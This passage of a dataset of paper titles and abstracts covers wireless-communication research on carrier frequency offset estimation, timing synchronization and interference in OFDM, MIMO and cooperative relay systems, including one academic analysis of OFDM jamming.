bandwidth are also presented. Simulations illustrate that this scheme has better MSE and bit error rate performance than the traditional scheme. Furthermore, the pilots are saved in this scheme, which lead to improved spectrum efficiency. --- paper_title: Differential modulation for amplify-and-forward two-way relaying with carrier offsets paper_content: In this paper, differential modulation (DM) schemes, including single differential and double differential, are proposed for amplify-and-forward two-way relaying (TWR) networks with unknown channel state information (CSI) and carrier frequency offsets. Most existing work in TWR assumes perfect channel knowledge at all nodes and no carrier offsets. However, accurate CSI can be difficult to obtain for fast varying channels while increases computational complexity in channel estimation, and commonly existing carrier offsets can greatly degrade the system performance. Therefore, we propose two schemes to remove the effect of unknown frequency offsets for TWR networks, when neither the sources nor the relay has any knowledge of CSI. Simulation results show that the proposed differential modulation schemes are both effective in overcoming the impact of carrier offsets with linear computational complexity. --- paper_title: Channel, Phase Noise, and Frequency Offset in OFDM Systems: Joint Estimation, Data Detection, and Hybrid Cramer-Rao Lower Bound paper_content: Oscillator phase noise (PHN) and carrier frequency offset (CFO) can adversely impact the performance of orthogonal frequency division multiplexing (OFDM) systems, since they can result in inter carrier interference and rotation of the signal constellation. In this paper, we propose an expectation conditional maximization (ECM) based algorithm for joint estimation of channel, PHN, and CFO in OFDM systems. We present the signal model for the estimation problem and derive the hybrid Cramer-Rao lower bound (HCRB) for the joint estimation problem. Next, we propose an iterative receiver based on an extended Kalman filter for joint data detection and PHN tracking. Numerical results show that, compared to existing algorithms, the performance of the proposed ECM-based estimator is closer to the derived HCRB and outperforms the existing estimation algorithms at moderate-to-high signal-to-noise ratio (SNR). In addition, the combined estimation algorithm and iterative receiver are more computationally efficient than existing algorithms and result in improved average uncoded and coded bit error rate (BER) performance. --- paper_title: Eigenvalue-Based Spectrum Sensing of Orthogonal Space-Time Block Coded Signals paper_content: We consider spectrum sensing of signals encoded with an orthogonal space-time block code (OSTBC). We propose a CFAR detector based on knowledge of the eigenvalue multiplicities of the covariance matrix which are inherent owing to the OSTBC and derive theoretical performance bounds. In addition, we show that the proposed detector is robust to a carrier frequency offset, and propose a detector that deals with timing synchronization using the detector for the synchronized case as a building block. The proposed detectors are shown numerically to perform well. --- paper_title: Design of Data-Aided SNR Estimator Robust to Frequency Offset for MPSK Signals paper_content: Data-aided (DA) signal-to-noise ratio (SNR) estimation is required especially at low SNR. The conventional maximum likelihood (ML) DA SNR estimator requires perfect carrier phase estimation and frequency recovery. In this paper, we propose a novel carrier frequency robust DA SNR estimator with its improved variant using autocorrelation of received MPSK symbols. Computer simulations are used to examine their performance in terms of mean estimation value (MEV) and normalized mean square error (NMSE). For the example system in simulations, the MEV of proposed estimator is accurate enough with normalized frequency error on the order of symbol rate. However, its NMSE can not reach DA normalized Cramer-Rao bound (NCRB) even with large observatory length, whereas its NMSE may perform a little worse at high SNR for short pilot symbols. On the other hand, fortunately the its improved variant can reach NCRB with enough pilot symbols. What's more, the proposed DA SNR estimators can operate under large frequency errors or before the frequency recovery unit with baud rate. The implementation complexity is also analyzed. --- paper_title: ICI Analysis for FRFT-OFDM Systems to Frequency Offset in Time-Frequency Selective Fading Channels paper_content: This letter presents the effects of frequency offset to orthogonal frequency division multiplexing systems based on fractional Fourier transform (FRFT-OFDM) in time-frequency selective fading channels. FRFT-OFDM systems generalize the OFDM systems based on discrete Fourier transform by the deployment of FRFT. The expressions of signal-to-interference ratio (SIR) due to ICI are derived in different fading channels. In a flat channel, the performances of both systems are the same. In a frequency selective channel, the FRFT-OFDM systems have superior SIR performances by choosing the optimal fractional factor, when Doppler spread is comparable to the inverse of the symbol duration or carrier offset exists in the system. --- paper_title: Blind carrier frequency offset estimation for interleaved orthogonal frequency division multiple access uplink with multi-antenna receiver: algorithms and performance analysis paper_content: In this study, for interleaved orthogonal frequency division multiple access uplink with multi-antenna receiver, we propose two generalised carrier frequency offset estimators which, respectively, exploit the subspace theory and maximum-likelihood (ML) criterion. We find that, as long as the numbers of multipaths from two of the users are smaller than the number of antennas at the receiver, both the proposed estimators support fully loaded transmissions. We also derive the theoretical performance lower bound for the proposed ML estimator. The numerical results are then provided, which corroborate the proposed studies. --- paper_title: Frequency Offset Estimation with Increased Nyquist Frequency paper_content: In wireless communication systems, there is a need to estimate and compensate for frequency offsets. What is common to frequency offset estimators, is that they only can give correct results within a certain range, up to the Nyquist frequency. This makes a difference especially in OFDM systems with pilots only at certain symbols, such as LTE. In this paper we present an algorithm where the Nyquist frequency is increased, up to the same value as if pilots were present in all OFDM symbols. The algorithm is based on using two or more frequency offset estimators, with lower, but different, Nyquist frequencies. --- paper_title: Effective Symbol Timing Recovery Based on Pilot-Aided Channel Estimation for MISO Transmission Mode of DVB-T2 System paper_content: This paper proposes an effective symbol timing recovery (STR) based on a pilot-aided channel impulse response (CIR) estimation for multi-input single-output (MISO) transmission mode of DVB-T2 system. In particular, this paper focuses on fine STR capable of resolving an ambiguity effect of the CIR which is caused by an inaccurate coarse symbol timing offset (STO). In the proposed fine STR, the CIR of the MISO channel is estimated after performing coarse STR. Then, the ambiguity of the CIR is investigated by categorizing it into four regions under the assumption of an inaccurate STO. Finally, accurate STO is estimated by changing the fast Fourier transform (FFT) window with respect to the ambiguity categorization. Performance evaluations are accomplished by comparing the proposed STR with the conventional STR in large delay channels. --- paper_title: A Time-Domain Joint Estimation Algorithm for CFO and I/Q Imbalance in Wideband Direct-Conversion Receivers paper_content: Carrier frequency offset (CFO) and in-phase and quadrature-phase (I/Q) imbalance are two of the common front-end impairments in low-cost communication devices. It is known that CFO can cause significant performance degradation in multi-carrier modulation (MCM) systems. Also, the existence of the I/Q imbalance usually reduces the accuracy of CFO estimation. In this paper, we propose a new data-aided scheme for the joint estimation of CFO and I/Q imbalance using simple matrix formulation. The proposed algorithms utilize only the periodicity of the generalized periodic pilot (GPP). They do not need to know the channel impulse response and the exact values of the training sequence. Moreover, our method has a low complexity and its performance compares favorably with the existing methods. --- paper_title: Universal-filtered multi-carrier technique for wireless systems beyond LTE paper_content: In this paper, we propose a multi-carrier transmission scheme to overcome the problem of intercarrier interference (ICI) in orthogonal frequency division multiplexing (OFDM) systems. In the proposed scheme, called universal-filtered multi-carrier (UFMC), a filtering operation is applied to a group of consecutive subcarriers (e.g. a given allocation of a single user) in order to reduce out-of-band sidelobe levels and subsequently minimize the potential ICI between adjacent users in case of asynchronous transmissions. We consider a coordinated multi-point (CoMP) reception technique, where a number of base stations (BSs) send the received signals from user equipments (UEs) to a CoMP central unit (CCU) for joint detection and processing. We examine the impact of carrier frequency offset (CFO) on the performance of the proposed scheme and compare the results with the performance of cyclic prefix based orthogonal frequency division multiplexing (CP-OFDM) systems. We use computer experiments to illustrate the efficiency of the proposed multi-carrier scheme. The results indicate that the UFMC scheme outperforms the OFDM for both perfect and non-perfect frequency synchronization between the UEs and BSs. --- paper_title: Resource Efficient Implementation of Low Power MB-OFDM PHY Baseband Modem With Highly Parallel Architecture paper_content: The multi-band orthogonal frequency-division multiplexing modem needs to process large amount of computations in short time for support of high data rates, i.e., up to 480 Mbps. In order to satisfy the performance requirement while reducing power consumption, a multi-way parallel architecture has been proposed. But the use of the high degree parallel architecture would increase chip resource significantly, thus a resource efficient design is essential. In this paper, we introduce several novel optimization techniques for resource efficient implementation of the baseband modem which has highly, i.e., 8-way, parallel architecture, such as new processing structures for a (de)interleaver and a packet synchronizer and algorithm reconstruction for a carrier frequency offset compensator. Also, we describe how to efficiently design several other components. The detailed analysis shows that our optimization technique could reduce the gate count by 27.6% on average, while none of techniques degraded the overall system performance. With 0.18-μm CMOS process, the gate count and power consumption of the entire baseband modem were about 785 kgates and less than 381 mW at 66 MHz clock rate, respectively. --- paper_title: A Novel Hierarchical Low Complexity Synchronization Method for OFDM Systems paper_content: A new hierarchical synchronization method is proposed for initial timing synchronization in orthogonal frequency-division multiplexing(OFDM) systems. Based on the proposal of new training symbol, a threshold based timing metric is designed for accurate estimation of start of OFDM symbol in a frequency selective channel. Threshold is defined in terms of noise distributions and false alarm, which makes it independent of type of channel it is applied. Frequency offset estimation is also done for the proposed training symbol. The performance of the proposed timing metric is evaluated using simulation results. The proposed method achieves low mean squared error(MSE) in timing offset estimation at five(5 x) times lower computational complexity compared to cross-correlation based method in a frequency selective channel. It is also computationally efficient compared to hybrid approaches for OFDM timing synchronization. --- paper_title: Blind Identification of Spatial Multiplexing and Alamouti Space-Time Block Code via Kolmogorov-Smirnov (K-S) Test paper_content: A novel algorithm for blind identification of spatial multiplexing and Alamouti space-time block code is proposed in this paper. It relies on the Kolmogrov-Smirnov test, and employs the maximum distance between the empirical cumulative distribution functions of two statistics derived from the received signal. The proposed algorithm does not require estimation of the channel coefficients, noise statistics and modulation type, and is robust to the carrier frequency offset and impulsive noise. Additionally, it outperforms the algorithms in the literature under a variety of transmission impairments. --- paper_title: Performance impact of asynchronous off-tone jamming attacks against OFDM paper_content: This paper presents power efficient asynchronous off-tone jamming attacks on orthogonal frequency division multiplexing (OFDM). Often wireless communication systems have to operate in environments, which are prone to unknown interference from adversaries such as jamming, which can lead to degradation of performance. This paper begins with presenting existing conventional jamming attacks, such as barrage jamming (BJ), partial band jamming (PBJ), single-tone jamming (STJ), and multi-tone jamming (MTJ) on OFDM and then proposes new power efficient jamming strategies. It is known that signal with frequency offset can affect more spectrum than the occupied bandwidth as the signal energy gets smeared into adjacent spectrum while performing FFT in the OFDM receiver, and thus create inter-channel interference (ICI). This paper builds on this idea, and presents new asynchronous single off-tone and multiple off-tone jamming attacks on OFDM. We first present our channel model, and then undertake an analysis of OFDM systems under off-tone jamming attacks, verifying the idea through simulation. Both analysis and simulation show that off-tone jamming attacks have more adverse effect than jammer aligned with the received signal. --- paper_title: A Novel Doppler Frequency Offset Estimation Method for DVB-T System in HST Environment paper_content: A novel Doppler frequency offset estimation method is proposed for the digital video broadcasting-terrestrial (DVB-T) system in the high-speed-train (HST) environment. Based on the analysis of the effect of the scattered components of the wireless channel on the accuracy of the Doppler frequency offset estimation, we separate the path with the Line-of-Sight(LOS) component from the multipath channel, and only use it to estimate the frequency offset caused by Doppler shift. Simulation results show that the mean square error (MSE) of the proposed scheme is far better than those of the available schemes. --- paper_title: SIR Analysis for OFDM Transmission in the Presence of CFO, Phase Noise and Doubly Selective Fading paper_content: This paper presents an analysis of the detrimental effects of carrier frequency offset (CFO), phase noise (PHN) and doubly-selective fading on orthogonal frequency division multiplexing (OFDM) transmission performance. In particular, we derive a closed-form expression for the signal-to-interference ratio (SIR) at an OFDM receiver in the presence of CFO, PHN and doubly-selective fading. Simulation and analytical results under various OFDM system settings are in good agreement and reveal the contributions of these channel impairments in the SIR degradation. --- paper_title: Iterative Timing Recovery with Turbo Decoding at Very Low SNRs paper_content: Turbo codes are near Shannon limit channel codes widely used in space communication systems and so on at low signal-to-noise rate (SNR). Timing recovery is one of the key technologies for these systems to work effectively. In this paper, an efficiently iterative timing recovery with Turbo decoding is presented. By maximizing the sum of the square of soft decision metrics from Turbo decoding, it can obtain accurate timing acquisition. And a computation-efficient approximate gradient descent method is adopted to obtain rough estimate of timing offset. Another merit of it is that, by the proposed method, a rate-1/6 Turbo coded binary phase shift keying (BPSK) system can even work at very low SNR (Es/N0) about -7.44 dB without any pilot symbol. Finally, the whole timing recovery scheme is accomplished where the proposed method is combined with Mueller-Muller (M&M) timing recovery which performs the timing track. Simulation results indicate that the Turbo coded BPSK system with rather large timing errors by the proposed scheme can achieve performance within 0.1 dB of the ideal code with reasonable computations and storages. --- paper_title: Simplified Multiaccess Interference Reduction for MC-CDMA With Carrier Frequency Offsets paper_content: Multicarrier code-division multiple-access (MC-CDMA) system performance can severely be degraded by multiaccess interference (MAI) due to the carrier frequency offset (CFO). We argue that MAI can more easily be reduced by employing complex carrier interferometry (CI) codes. We consider the scenario with spread gain N, multipath length L, and N users, i.e., a fully loaded system. It is proved that, when CI codes are used, each user only needs to combat 2(L - 1) (rather than N - 1) interferers, even in the presence of CFO. It is shown that this property of MC-CDMA with CI codes in a CFO channel can be exploited to simplify three multiuser detectors, namely, parallel interference cancellation (PIC), maximum-likelihood, and decorrelating multiuser detectors. The bit-error probability (BEP) for MC-CDMA with binary phase-shift keying (BPSK) modulation and single-stage PIC and an upper bound for the minimum error probability are derived. Finally, simulation results are given to corroborate theoretical results. --- paper_title: Interference Analysis in Time and Frequency Asynchronous Network MIMO OFDM Systems paper_content: It is well known that symbol timing offsets larger than the cyclic prefix as well as carrier frequency offsets between transmitter and receiver stations destroy the orthogonality among OFDM subcarriers and induce additional interference. In conjunction with MIMO transmission on frequency selective fading channels where different users interfere with each other, these effects strongly degrades the signal detection performance. In this paper we consider fully asynchronous spatially multiplexed transmission with different symbol timing and carrier frequency offsets on each transmitter-receiver link which appear in distributed MIMO systems with multiple users and base stations. We derive a factorized system model for signal transmission in frequency domain where the different effects of inter-carrier, inter-symbol and inter-block interference are separated and analyzed in terms of signal-to-interference-noise-ratio degradation. Finally, we evaluate the interference levels at a receiver station for different link-level as well as system-level simulation setups. --- paper_title: Physical-Layer Network Coding Using FSK Modulation under Frequency Offset paper_content: Physical-layer network coding is a protocol capable of increasing throughput over conventional relaying in the two- way relay channel, but is sensitive to phase and frequency offsets among transmitted signals. Modulation techniques which require no phase synchronization such as noncoherent FSK can compensate for phase offset, however, the relay receiver must still compensate for frequency offset. In this work, a soft- output noncoherent detector for the relay is derived, under the assumption that the source oscillators generating FSK tones lack frequency synchronization. The derived detector is shown through simulation to improve error rate performance over a conventional detector which does not model offset, for offset values on the order of a few hundredths of a fraction of FSK tone spacing. --- paper_title: A New ML Detector for SIMO Systems with Imperfect Channel and Carrier Frequency Offset Estimation paper_content: The objective of this paper is to develop a new detection algorithm for single input multiple output (SIMO) systems, using maximum likelihood (ML) scheme. The proposed method takes into account both channel and carrier frequency offset (CFO) estimation errors for detection of the transmitted data. Simulation results show that the new algorithm improve performance in the presence of multiple estimation error variances as compared to the conventional method for different modulation schemes. --- paper_title: A Novel Effective ICI Self-Cancellation Method paper_content: Orthogonal Frequency Division Multiplexing (OFDM) systems may suffer from both carrier frequency offset (CFO) and in-phase/quadrature-phase (I/Q) imbalance at the receiver front end. In this paper, a novel type of intercarrier interference (ICI) self-cancellation method using mirror mapping is proposed to combat these impairment. Based on the proposed novel method and by adopting two widely used mapping operations, we altogether derive two different mirror mapping schemes. Analysis and simulation results verify that the proposed mirror mapping schemes not only inherit the efficiency of the existing self-cancellation schemes in suppressing ICI caused by CFO but also have the ability of compressing or even eliminating IQ imbalance. --- paper_title: Synchronization for TDS-OFDM over multipath fading channels paper_content: Time domain synchronous orthogonal frequency division multiplex (TDS-OFDM) is an effective multi-carrier modulation scheme to improve the spectrum efficiency. However, conventional synchronization algorithm based on the correlation property of the time-domain pseudo-noise (PN) sequence may not work well over severe multipath fading channels when large carrier frequency offset (CFO) exits. In this paper, a robust synchronization algorithm is proposed where the PN sequence in the frame head is considered as a cyclic prefix (CP) OFDM training symbol. The time-domain slide auto-correlation based on the cyclic structure of the PN sequence is adopted for timing and fine CFO estimation, while in the frequency domain, a differential correlation is applied for large CFO estimation. Simulations demonstrate that the proposed method could achieve the satisfactory performance over multipath fading channels. In addition, to reduce the implementation complexity, the frame head of the TDS-OFDM system is preferred to be binary PN sequences in the frequency domain with cyclic structure in the time domain. --- paper_title: Blind carrier frequency offset estimation for tile-based orthogonal frequency division multiple access uplink with multi-antenna receiver paper_content: In this study, the authors propose a blind carrier frequency offset (CFO) estimation method for the tile structure orthogonal frequency division multiple access (OFDMA) uplink with multi-antenna receiver. They employ an iterative approach to extract the signal component for each user gradually and propose a carefully designed CFO estimator to update the CFO estimate during the iterative procedure. The key ingredient of the proposed method is using few subcarriers on both sides within each tile as the ‘guard subcarriers’, which can greatly mitigate the effect of multi-user interference. The proposed method supports not only fully loaded transmissions, but also the generalised assignment scheme that provides the flexibility for dynamical resource allocation. The numerical results are provided, which indicate that the proposed method can almost converge to the analytical lower bound within a few iterative cycles. It is seen that the proposed method also outperforms the existing competitor with multi-antenna receiver in terms of estimation performance, especially with few adopted blocks. --- paper_title: Estimation, Training, and Effect of Timing Offsets in Distributed Cooperative Networks paper_content: Successful collaboration in cooperative networks require accurate estimation of multiple timing offsets. When combined with signal processing algorithms the estimated timing offsets can be applied to mitigate the resulting inter-symbol interference (ISI). This paper seeks to address timing synchronization in distributed multi-relay amplify-and-forward (AF) and decode-and-forward (DF) relaying networks, where timing offset estimation using a training sequence is analyzed. First, training sequence design guidelines are presented that are shown to result in improved estimation performance. Next, two iterative estimators are derived that can determine multiple timing offsets at the destination. The proposed estimators have a considerably lower computational complexity while numerical results demonstrate that they are accurate and reach or approach the Cramer-Rao lower bound (CRLB). --- paper_title: Timing and Carrier Synchronization With Channel Estimation in Multi-Relay Cooperative Networks paper_content: Multiple distributed nodes in cooperative networks generally are subject to multiple carrier frequency offsets (MCFOs) and multiple timing offsets (MTOs), which result in time varying channels and erroneous decoding. This paper seeks to develop estimation and detection algorithms that enable cooperative communications for both decode-and-forward (DF) and amplify-and-forward (AF) relaying networks in the presence of MCFOs, MTOs, and unknown channel gains. A novel transceiver structure at the relays for achieving synchronization in AF-relaying networks is proposed. New exact closed-form expressions for the Cramer-Rao lower bounds (CRLBs) for the multi-parameter estimation problem are derived. Next, two iterative algorithms based on the expectation conditional maximization (ECM) and space-alternating generalized expectation-maximization (SAGE) algorithms are proposed for jointly estimating MCFOs, MTOs, and channel gains at the destination. Though the global convergence of the proposed ECM and SAGE estimators cannot be shown analytically, numerical simulations indicate that through appropriate initialization the proposed algorithms can estimate channel and synchronization impairments in a few iterations. Finally, a maximum likelihood (ML) decoder is devised for decoding the received signal at the destination in the presence of MCFOs and MTOs. Simulation results show that through the application of the proposed estimation and decoding methods, cooperative systems result in significant performance gains even in presence of impairments. --- paper_title: Frequency estimation of single tone signals with bit transition paper_content: Frequency estimation of a single tone signal is important in many applications. In this study, a frequency estimation algorithm is proposed for single tone signals modulated with unknown data. The proposed unbiased frequency estimator (UFE) uses discrete Fourier transform (DFT) coefficients to calculate the accurate frequency offset. To achieve better performance in a noisy environment, a biased frequency estimator (BFE) is obtained by applying trigonometric approximation to UFE. The Taylor expansion of BFE is also proposed to meet the computational complexity requirement in some real-time applications. The performance of the proposed algorithm is evaluated through Monte Carlo simulations, compared with conventional interpolated DFT-based algorithm and typical non-data-aided frequency estimation algorithm. --- paper_title: Quasi-maximum likelihood initial downlink synchronization for IEEE 802.16m paper_content: We consider initial downlink synchronization for the emerging IEEE 802.16m standard. Such synchronization involves estimation of the carrier frequency offset, signal timing, and the index of “Primary Advanced Preamble” (PA-Preamble) over a multipath channel. We first give a brief overview of some relevant signal properties in IEEE 802.16m. These properties are rather different from other recent standards to the point of needing a new synchronization algorithm. We develop a synchronization method based on the maximum likelihood (ML) principle. It turns out that the multipath channel response is also estimated along the way. The resulting method is considered quasi-ML because some approximations are used to simplify computation. Simulation results are presented to illustrate its performance. --- paper_title: Are SC-FDE Systems Robust to CFO? paper_content: This paper investigates the impact of carrier frequency offset (CFO) on Single Carrier wireless communication systems with Frequency Domain Equalization (SC-FDE). We show that CFO in SC-FDE systems causes irrecoverable channel estimation error, which leads to inter-symbol-interference (ISI). The impact of CFO on SC-FDE and OFDM is compared in the presence of CFO and channel estimation errors. Closed form expressions of signal to interference and noise ratio (SINR) are derived for both systems, and verified by simulation results. We find that when channel estimation errors are considered, SC-FDE is similarly or even more sensitive to CFO, compared to OFDM. In particular, in SC-FDE systems, CFO mainly deteriorates the system performance via degrading the channel estimation. Both analytical and simulation results highlight the importance of accurate CFO estimation in SC-FDE systems. --- paper_title: Joint Carrier Frequency Offset and Channel Estimation for OFDM Systems via the EM Algorithm in the Presence of Very High Mobility paper_content: In this paper, the problem of joint carrier frequency offset (CFO) and channel estimation for OFDM systems over the fast time-varying frequency-selective channel is explored within the framework of the expectation-maximization (EM) algorithm and parametric channel model. Assuming that the path delays are known, a novel iterative pilot-aided algorithm for joint estimation of the multipath Rayleigh channel complex gains (CG) and the carrier frequency offset (CFO) is introduced. Each CG time-variation, within one OFDM symbol, is approximated by a basis expansion model (BEM) representation. An autoregressive (AR) model is built to statistically characterize the variations of the BEM coefficients across the OFDM blocks. In addition to the algorithm, the derivation of the hybrid Cramer-Rao bound (HCRB) for CFO and CGs estimation in our context of very high mobility is provided. We show that the proposed EM has a lower computational complexity than the optimum maximum a posteriori estimator and yet incurs only an insignificant loss in performance. --- paper_title: Timing, Carrier, and Frame Synchronization of Burst-Mode CPM paper_content: In this paper, we propose a complete synchronization algorithm for continuous phase modulation (CPM) signals in burst-mode transmission over additive white Gaussian noise (AWGN) channels. The timing and carrier recovery are performed through a data-aided (DA) maximum likelihood algorithm, which jointly estimates symbol timing, carrier phase, and frequency offsets based on an optimized synchronization preamble. Our algorithm estimates the frequency offset via a one-dimensional grid search, after which symbol timing and carrier phase are computed via simple closed-form expressions. The mean-square error (MSE) of the algorithm's estimates reveals that it performs very close to the theoretical Cramer-Rao bound (CRB) for various CPMs at signal-to-noise ratios (SNRs) as low as 0 dB. Furthermore, we present a frame synchronization algorithm that detects the arrival of bursts and estimates the start-of-signal. We simulate the performance of the frame synchronization algorithm along with the timing and carrier recovery algorithm. The bit error rate results demonstrate near ideal synchronization performance for low SNRs and short preambles. --- paper_title: Decentralised ranging method for orthogonal frequency division multiple access systems with amplify-and-forward relays paper_content: In this study, a decentralised ranging method for uplink orthogonal frequency division multiple access (OFDMA) systems with half-duplex (HD) amplify-and-forward (AF) relay stations (RSs) is proposed. In the OFDMA systems with HD AF RSs, twice more resources and delays are required as ranging without RS. To reduce the required resources and delays for ranging, the authors propose a two-phase ranging scheme based on the decentralised timing-offset estimation at each ranging mobile station (MS). At the first phase, RS occasionally broadcasts timing reference signal, and at the second phase RS retransmits the collected ranging signals from the MSs. Then, each ranging MSs can individually estimate its own timing offset from the received signals. In the proposed ranging method, the base station does not need to send a timing-adjustment message, and the overhead associated with ranging in the downlink resources, and computational complexity can be significantly reduced without degrading the timing-offset-estimation performance. Moreover, the delay associated with ranging can be maintained as same as ranging without RS. --- paper_title: Maximum Likelihood Frequency Estimation and Preamble Identification in OFDMA-based WiMAX Systems paper_content: In multi-cellular WiMAX systems based on orthogonal frequency-division multiple-access (OFDMA), the training preamble is chosen from a set of known sequences so as to univocally identify the transmitting base station. Therefore, in addition to timing and frequency synchronization, preamble index identification is another fundamental task that a mobile terminal must successfully complete before establishing a communication link with the base station. In this work we investigate the joint maximum likelihood (ML) estimation of the carrier frequency offset (CFO) and preamble index in a multicarrier system compliant with the WiMAX specifications, and derive a novel expression of the relevant Cramer-Rao bound (CRB). Since the exact ML solution is prohibitively complex in its general formulation, suboptimal algorithms are developed which can provide a reasonable trade-off between estimation accuracy and processing load. Specifically, we show that the fractional CFO can be recovered by combining the ML estimator with an existing algorithm that attains the CRB in all practical scenarios. The integral CFO and preamble index are subsequently retrieved by a suitable approximation of their joint ML estimator. Compared to existing alternatives, the resulting scheme exhibits improved accuracy and reduced sensitivity to residual timing errors. The price for these advantages is a certain increase of the system complexity. --- paper_title: Bounds and Algorithms for Multiple Frequency Offset Estimation in Cooperative Networks paper_content: The distributed nature of cooperative networks may result in multiple carrier frequency offsets (CFOs), which make the channels time varying and overshadow the diversity gains promised by collaborative communications. This paper seeks to address multiple CFO estimation using training sequences in space-division multiple access (SDMA) cooperative networks. The system model and CFO estimation problem for cases of both decode-and-forward (DF) and amplify-and-forward (AF) relaying are formulated and new closed-form expressions for the Cramer-Rao lower bound (CRLB) for both protocols are derived. The CRLBs are then applied in a novel way to formulate training sequence design guidelines and determine the effect of network protocol and topology on CFO estimation. Next, two computationally efficient iterative estimators are proposed that determine the CFOs from multiple simultaneously relaying nodes. The proposed algorithms reduce multiple CFO estimation complexity without sacrificing bandwidth and training performance. Unlike existing multiple CFO estimators, the proposed estimators are also accurate for both large and small CFO values. Numerical results show that the new methods outperform existing algorithms and reach or approach the CRLB at mid-to-high signal-to-noise ratio (SNR). When applied to system compensation, simulation results show that the proposed estimators significantly reduce average-bit-error-rate (ABER). --- paper_title: Space-time coding for time and frequency asynchronous CoMP transmissions paper_content: This paper deals with time and frequency offset in coordinated multipoint (CoMP) transmission/reception networks by using distributed linear convolutional space-time coding (DLC-STC). We first prove that perfect time synchronization is impractical for CoMP transmission/reception networks. Then the DLC-STC scheme, in which exact time synchronization at the relay nodes is unnecessary, is proposed for the CoMP joint processing mode (CoMP-JP). Finally, we show the detecting method by minimum mean-squared error decision-feedback equalizer (MMSE-DFE) receivers with any frequency offsets. Simulation results show that with MMSE-DFE receivers, the proposed DLC-STC scheme outperforms the delay diversity scheme and the MMSE-DFE receivers can achieve the same diversity orders as the maximum likelihood sequence detection (MLSD) receivers. --- paper_title: Low Complexity Pilot Assisted Carrier Frequency Offset Estimation for OFDMA Uplink Systems paper_content: In this letter, we propose a low complexity pilot aided carrier frequency offset (CFO) estimation algorithm for orthogonal frequency division multiplexing access (OFDMA) uplink systems based on two consecutive received OFDMA symbols. Assuming that the channels and the CFOs are static over the two consecutive symbols, we express the second received OFDMA symbol in terms of the CFOs and the first OFDMA symbol. Based on this signal model, a new estimation algorithm which obtains the CFOs by minimizing the mean square distance between the received OFDMA symbol and its regenerated signal is provided. Also, we implement the proposed algorithm via fast Fourier transform (FFT) operations by utilizing the block matrix inversion lemma and the conjugate gradient method. Simulation results show that the proposed algorithm approaches the average Cramer Rao bound for moderate and high signal to noise ratio (SNR) regions. Moreover, the algorithm can be applied for any carrier assignment schemes with low complexity. --- paper_title: Preamble Design Using Embedded Signaling for OFDM Broadcast Systems Based on Reduced-Complexity Distance Detection paper_content: The second-generation digital terrestrial television broadcasting standard adopts the so-called P1 symbol as the preamble for initial synchronization. The P1 symbol also carries a number of basic transmission parameters, including the fast Fourier transform size and the single-input/single-output as well as multiple-input/single-output mode, to appropriately configure the receiver for carrying out the subsequent processing. In this paper, an improved preamble design is proposed, where a pair of training sequences is inserted in the frequency domain, and their distance is used for transmission parameter signaling. At the receiver, only a low-complexity correlator is required for the detection of the signaling. Both the coarse carrier frequency offset and the signaling can simultaneously be estimated by detecting the aforementioned correlation. Compared with the standardized P1 symbol, the proposed preamble design significantly reduces the complexity of the receiver while retaining high robustness in frequency-selective fading channels. Furthermore, we demonstrate that the proposed preamble design achieves better signaling performance than the standardized P1 symbol despite reducing the numbers of multiplications and additions by about 40% and 20%, respectively. --- paper_title: Challenges in Reconfigurable Radio Transceivers and Application of Nonlinear Signal Processing for RF Impairment Mitigation paper_content: The design of compact and reconfigurable radio transceivers with low power consumption and low cost is a challenging task in future wireless communications systems. Transceiver architectures that are amenable to high-level integration will inevitably suffer from various radio frequency (RF) impairments, which limits the communications system performance and hence hinders their wide-spread use in commercial products. In this paper, we present the mitigation of RF impairments as a system identification problem. Four major classes of RF impairments are presented: power amplifier (PA) nonlinearity, in-phase/ quadrature (I/Q) impairments, group delay distortion, and carrier frequency offset and phase noise. Their models and up-todate identification techniques are described here. In particular, various nonlinear signal processing techniques that are effective in mitigating these impairments are also presented here. Theoretical and experimental results show that these mitigation techniques can significantly improve the communications system performance. --- paper_title: H-inf channel estimation for MIMO-OFDM systems in the presence of carrier frequency offset paper_content: An H-infinity (H-inf) channel estimation algorithm is proposed for estimating the channels in MIMO-OFDM systems in the presence of carrier frequency offset (CFO). The goal is to contribute to an algorithm with low complexity, good estimate performance and better suppression to CFO. For this purpose, the H-inf with simplified objective function is first developed, and then, its computational load is reduced by using the iterative expectation maximization (EM) process. To resistant the CFO, we derive a precise equivalent signal model (ESM) to identify the channels. It is observed that the H-inf estimator could be regarded as a substitute for optimal maximum a posteriori (MAP) estimator, but with much less complexity. At the same time, by using ESM, a remarkable improvement for the performance degradation caused by CFO will appear. --- paper_title: Joint estimation of CFO and receiver I/Q imbalance using virtual subcarriers for OFDM systems paper_content: In this paper, we study the estimation of carrier frequency offset (CFO) in the presence of the receiver in-phase and quadrature-phase (I/Q) imbalance for orthogonal frequency division multiplexing (OFDM) systems. By minimizing the energy of the samples on the virtual subcarriers, our proposed algorithm can jointly estimate the CFO and I/Q parameters using one OFDM block. When the CFO is small, a closed-form solution can be obtained. Simulation results show that our proposed method can provide a good performance for both of the I/Q and CFO estimation and it compares favorably with a recent method. --- paper_title: A Low Complexity Equalization Method for Cooperative Communication Systems Based on Distributed Frequency-Domain Linear Convolutive Space-Frequency Codes paper_content: In this paper, we consider the cooperative communication system based on distributed frequency-domain linear convolutive space-frequency codes (FLC-SFC) with multiple carrier frequency offsets (CFOs) when the channels from relay nodes to destination node are flat fading. Through the mathematical derivation, the cooperative system model is simplified. Then, the equivalent banded system model is obtained and the related analysis shows the banded property of the equivalent channel matrix. Furthermore, a banded block minimum mean square error (MMSE) equalization method applying LDLH matrix decomposition is proposed for the banded system model. Besides, a special class of mask matrix is utilized to realize the banded operation. Compared with the traditional MMSE equalization method, the proposed equalization method has a relatively low computational complexity with satisfactory system performance. --- paper_title: Multiplication-Free Estimation of Integer Frequency Offset for OFDM-Based DRM Systems paper_content: This letter proposes a low complexity integer frequency offset (IFO) estimation scheme in an orthogonal frequency division multiplexing (OFDM) based digital radio mondiale plus (DRM+) system with nonuniform phased pilot symbols. To reduce the computational complexity, the pilot symbols used for frequency estimation in the DRM+ system are partitioned into a number of pilot subsets, and pilots in each subset are phase-rotated to have a unique phase so that the estimator is made computationally efficient. --- paper_title: Timing and Frequency Synchronization for Cooperative Relay Networks paper_content: This paper deals with timing and frequency synchronization in multi-relay cooperative networks operating with both large and small carrier frequency offset (CFO) over frequency-selective channels. A novel preamble based on constant amplitude zero auto-correlation (CAZAC) sequence is proposed, and a corresponding practical multistage scheme is presented. Joint timing and integral frequency synchronization is involved to resist multi-relay interference (MRI). Then, fractional frequency estimation is carried out, and fine timing estimation completes the synchronization scheme. The performance is evaluated in terms of the mean square error (MSE). 